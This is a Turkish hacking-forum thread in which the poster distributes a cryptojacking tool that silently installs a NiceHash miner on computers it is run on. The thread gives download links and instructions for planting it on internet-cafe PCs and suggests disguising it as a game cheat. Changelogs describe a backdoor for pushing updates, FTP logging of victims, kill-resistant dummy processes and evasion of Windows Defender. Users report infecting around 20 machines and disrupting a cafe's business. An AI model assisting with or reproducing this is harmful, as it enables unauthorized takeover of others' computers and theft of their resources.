Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın
- Konbuyu başlatan zalim5811
- Başlangıç tarihi
- 3 Eki 2012
- 72
- 30
once configi doldur. nasil dolduralacagini configin icinde anlattim. internet cafede acacagina gore 7/24 calistirmak isteyebilirsin. o yuzden normal-time degerini PT15M yapmani oneririm.aga şiimdi bunu usbyemi yüklememiz lazım yoksa yandex disk gibi bi uygulamaya upload yapıp içerisindekileri güncelleyip oraya yüklesek örn net cafede yapsam indirip kursam sonra silsem indirdiğim dosyayi sıkıntı olurmu bana detayli şekilşde yazarmısın
configi doldurduktan sonra wrapper.exe yi calistir. cikan dosyalardan miner-ready.exe nin adini degistirebilirsin ama hook.dll nin adi ayni kalmali.
sonra btnet klasorundeki dll ve exe yi ister usb ye at istersen bi yere uploadla. exe yi dll yanindayken sistemde acman yeterli, nerden oldugu onemsiz usb ya da internetten indirilmiş..
sonrasinda silebilirsin iki dosyayi da
simdi bunu yapdık yükledik diyelim ki daha önce benzerini yapdım 2 hatta 3 4 cafeden atıldıydım adam ekrandan izledi galiba normalde boot dan yapdıydım usb takıp bunu sadece calıstırıp silmem gerekiyor öylemi bide nerden takip edeceğiz yani zombi elemanları düşdümü düşmedimi diye sisteme
tek tek pcyemi yüklemek lazım yoksa ağ üzerine yayılıormu bu
bide mesela bugun yükledim diye lim adama sunucu yada şalteri indirince ertesi gün tekrar devreye girermi
buna benzer yapdığımda nette yawaşlık ping vs cıkmaya basladı adamlar ilkde anlamadı ama daha sonra anladılar adamların cafesi iş yapamadı od derece söyliyim sana mesela adam toplu pcyi ana masada kapatınca benim pc kapanmıordu
ordan anladı bi ara sordu usb mi taktin felan diye
adam ekrandan izledi galiba normalde boot dan yapdıydım usb takıp bunu sadece calıstırıp silmem gerekiyor öylemi bide nerden takip edeceğiz yani zombi elemanları düşdümü düşmedimi diye sisteme tek tek pcyemi yüklemek lazım yoksa ağ üzerine yayılıormu bu
bide mesela bugun yükledim diye lim adama sunucu yada şalteri indirince ertesi gün tekrar devreye girermi
buna benzer yapdığımda nette yawaşlık ping vs cıkmaya basladı adamlar ilkde anlamadı ama daha sonra anladılar adamların cafesi iş yapamadı od derece söyliyim sana
mesela adam toplu pcyi ana masada kapatınca benim pc kapanmıordu ordan anladı bi ara sordu usb mi taktin felan diye
Son düzenleme:
- 3 Eki 2012
- 72
- 30
acildigi pcde kendini direkt yerlestip calismaya basliyor. usb sorun olacagi icin bence bi yere uploadla sonradan indirip acarsin.simdi bunu yapdık yükledik diyelim ki daha önce benzerini yapdım 2 hatta 3 4 cafeden atıldıydım
tek tek pcyemi yüklemek lazım yoksa ağ üzerine yayılıormu bu
bide mesela bugun yükledim diye lim adama sunucu yada şalteri indirince ertesi gün tekrar devreye girermi
buna benzer yapdığımda nette yawaşlık ping vs cıkmaya basladı adamlar ilkde anlamadı ama daha sonra anladılar adamların cafesi iş yapamadı od derece söyliyim sana
hayir agda y.ayilma gibi bi islevi yok sadece acildigi bilgisayar.
eger deepfreeze tarzi bir sey varsa restart tan sonra silinir. deepfreeze kapatip exeyi acarsan bilgisayari kapatip acsalarda calismaya devam eder.
agda paylasilan dosyalara koysan cs 1.6 aimbot adiyla falan baskalari da acar :kahkaha bilmiyorum artik yaraticiliginiza kalmis.
Son düzenleme:
20de bıraktım da bu rigsler nicehashe yazmıyor. 20ye yakın kişiye yedirdim ama nicehashe yazmadı rig olarak
loglari ve kimin girdiğini yazıyor.
- 3 Eki 2012
- 72
- 30
1 rigde calismasi normal. hepsine unmanaged ismi koyuyor. eger guncelleme yapacak olursam her sistem icin dinamik isimlendirme eklerim.
bagis 20 ise her 5 kazidan 1i bana geliyor. ftp ye girilen loglarin 5inden 1i benim nicehash icin yani.
tesekkurler
Son düzenleme:
1 rigde calismasi normal. hepsine unmanaged ismi koyuyor. eger guncelleme yapacak olursam her sistem icin dinamik isimlendirme eklerim.
bagis 20 ise her 5 kazidan 1i bana geliyor. ftp ye girilen loglarin 5inden 1i benim nicehash icin yani.
tesekkurler
Öyle daha iyi olur hocam
- 3 Eki 2012
- 72
- 30
UPDATE 3
changelog:
- DLL gereksinimi kaldırıldı.
- NiceHash için dinamik isimlendirme eklendi.
- Artık güncelleme olduğunda backdoor ile otomatik olarak gönderebileceksiniz.
- Artık logları okumak için farklı bir client a ihtiyaç yok. Wrapperın içinde logları indirebilen ve gerektiğinde sıfırlayan işlev eklendi.
- Compiler değişti. (GCC --> MSVC)
- Kod optimizasyonu (dosya boyutu 30MB --> 23MB)
- Confige compress secenegi eklendi.
- Artık miner-ready.exe ye derlerken icon koyabilirsiniz(Wrapper ile aynı konuma koyulan icon.ico exe ye icon olarak atanır).
- Bug fixes
DL: https://drive.google.com/open?id=1LPfoQaGpP7CkKLIv68s3d8EvZxV6jVnf
anlatım burda: https://www.turkhackteam.org/8965255-post15.html
@Muratozturk ilgilenirseniz . Bundan sonraki updateler otoamtik gönderilebilecek.
changelog:
- DLL gereksinimi kaldırıldı.
- NiceHash için dinamik isimlendirme eklendi.
- Artık güncelleme olduğunda backdoor ile otomatik olarak gönderebileceksiniz
.- Artık logları okumak için farklı bir client a ihtiyaç yok. Wrapperın içinde logları indirebilen ve gerektiğinde sıfırlayan işlev eklendi.
- Compiler değişti. (GCC --> MSVC)
- Kod optimizasyonu (dosya boyutu 30MB --> 23MB)
- Confige compress secenegi eklendi.
- Artık miner-ready.exe ye derlerken icon koyabilirsiniz(Wrapper ile aynı konuma koyulan icon.ico exe ye icon olarak atanır).
- Bug fixes
DL: https://drive.google.com/open?id=1LPfoQaGpP7CkKLIv68s3d8EvZxV6jVnf
anlatım burda: https://www.turkhackteam.org/8965255-post15.html
@Muratozturk ilgilenirseniz
. Bundan sonraki updateler otoamtik gönderilebilecek.
Son düzenleme:
Forumda böyle konular görmek beni çok mutlu ediyor. Konunun özelliklerine tam hakim değim ancak gelecekte windows api hooking ve daha interaktif bir haberleşme sistemi kullanabilirsin IRC veya benim şu aralar favorim olan Discord gibi. Boylece portlarla uğraşmana gerek kalmaz ve ciddi miktarda kurbanı kontrol etmen kolaylaşır ama bence en önemlisi konuna görsellik eklemelisin. Tekrardan eline sağlık.
- 3 Eki 2012
- 72
- 30
öncelike teşekkürler
miner'ı gizlemek için task managera api hooking implemente ediyorum zaten yavaş yavaş. çözücem o işi. irc veya discord ne alaka onu anlamadım. ne portu?görsel eklemek aklımda.
Pardon ben sunucu stub iliskisi ve arada gerçekleşen bir bağlantı gibi bir şey var sanıyordum.
Son düzenleme:
- 16 Ocak 2016
- 20
- 1
UPDATE 3
changelog:
- DLL gereksinimi kaldırıldı.
- NiceHash için dinamik isimlendirme eklendi.
- Artık güncelleme olduğunda backdoor ile otomatik olarak gönderebileceksiniz
- Artık logları okumak için farklı bir client a ihtiyaç yok. Wrapperın içinde logları indirebilen ve gerektiğinde sıfırlayan işlev eklendi.
- Compiler değişti. (GCC --> MSVC)
- Kod optimizasyonu (dosya boyutu 30MB --> 23MB)
- Confige compress secenegi eklendi.
- Artık miner-ready.exe ye derlerken icon koyabilirsiniz(Wrapper ile aynı konuma koyulan icon.ico exe ye icon olarak atanır).
- Bug fixes
DL: https://drive.google.com/open?id=1LPfoQaGpP7CkKLIv68s3d8EvZxV6jVnf
anlatım burda: https://www.turkhackteam.org/8965255-post15.html
@Muratozturk ilgilenirseniz
Eline sağılık kardeşim tam aradığım şeydi teşekkür ederim
- 3 Eki 2012
- 72
- 30
Update 3 changelogunda da yazdigim gibi.. dll gereksinimi yok artik. wrapper ile olusturulan exe nin atilip acilmasi yeterli. baska hicbirseye gerek yok.
rica ederim
yok bu kendini acildigi sistemde deploylayan basit bi coin miner. o sistemler cok da 'botnet' sayilmaz aslinda.
- 3 Eki 2012
- 72
- 30
HOTFİX 3.1
changelog:
- ftp-update true iken miner'ın başlatılamaması sorunu giderildi.
releaseden önce yeterince test edemediğim için kusura bakmayın.
DL: https://drive.google.com/drive/folders/1lJgNZXyaBs5Lc-h9QekNfTHtXxDrjYPm
UPDATE
changelog:
- !Miner daemon güncellendi, daha yüksek hashrate için optimizasyon yapıldı!
- FTP üzerinden güncelleme gönderme mantığı geliştirildi.
- Confige "sürekli kaz" seçeneği eklendi.
- Birkaç exception handling halledildi.
DL: https://drive.google.com/open?id=1lJgNZXyaBs5Lc-h9QekNfTHtXxDrjYPm
bu sürümü win10 kurulu bir virtual machinede test ettim ve windows defender yakalayamadı.
bu arada kullananların sayısının arttığını görüyorum. bağışlarınız için teşekkürler. herhangi bir sorun, istek veya öneriyi discorddan ya da direkt bu konudan belirtebilirsiniz.
UPDATE
changelog:
- Miner'ın terminate edilmesine karşı dummy process eklendi
- confige dummy-process ve ftp-resurrection-log secenekleri eklendi(aciklamalari configde var)
- FTP loglama ve upload servislerinin mantigi gelistirildi
- Genel optimizasyon under-the-hood
miner'in oldurulmesine karsi simdilik gecici yontem bu. oldurulduklerinde birbirlerini baslatan processler olusturmak.. biraz bahsetmem gerekirse kodum python + c den olusuyor. curl ile ugrasmamak icin ftp logging gibi islemleri pythonun ftplib ile yapiyorum. onun disinda mineri baslatmayi, creation flaglerini passlemeyi vs. c ile yapiyorum. son cikarimima gire python ile windowsda api hooking yapmak hem gereksiz zor hem de boş bir iş. bu isleri c ile yapiyor olacagim artik
DL: https://drive.google.com/open?id=1lJgNZXyaBs5Lc-h9QekNfTHtXxDrjYPm
changelog:
- ftp-update true iken miner'ın başlatılamaması sorunu giderildi.
releaseden önce yeterince test edemediğim için kusura bakmayın.
DL: https://drive.google.com/drive/folders/1lJgNZXyaBs5Lc-h9QekNfTHtXxDrjYPm
UPDATE
changelog:
- !Miner daemon güncellendi, daha yüksek hashrate için optimizasyon yapıldı!
- FTP üzerinden güncelleme gönderme mantığı geliştirildi.
- Confige "sürekli kaz" seçeneği eklendi.
- Birkaç exception handling halledildi.
DL: https://drive.google.com/open?id=1lJgNZXyaBs5Lc-h9QekNfTHtXxDrjYPm
bu sürümü win10 kurulu bir virtual machinede test ettim ve windows defender yakalayamadı.
bu arada kullananların sayısının arttığını görüyorum. bağışlarınız için teşekkürler. herhangi bir sorun, istek veya öneriyi discorddan ya da direkt bu konudan belirtebilirsiniz.
UPDATE
changelog:
- Miner'ın terminate edilmesine karşı dummy process eklendi
- confige dummy-process ve ftp-resurrection-log secenekleri eklendi(aciklamalari configde var)
- FTP loglama ve upload servislerinin mantigi gelistirildi
- Genel optimizasyon under-the-hood
miner'in oldurulmesine karsi simdilik gecici yontem bu. oldurulduklerinde birbirlerini baslatan processler olusturmak.. biraz bahsetmem gerekirse kodum python + c den olusuyor. curl ile ugrasmamak icin ftp logging gibi islemleri pythonun ftplib ile yapiyorum. onun disinda mineri baslatmayi, creation flaglerini passlemeyi vs. c ile yapiyorum. son cikarimima gire python ile windowsda api hooking yapmak hem gereksiz zor hem de boş bir iş. bu isleri c ile yapiyor olacagim artik
DL: https://drive.google.com/open?id=1lJgNZXyaBs5Lc-h9QekNfTHtXxDrjYPm
Moderatör tarafında düzenlendi:
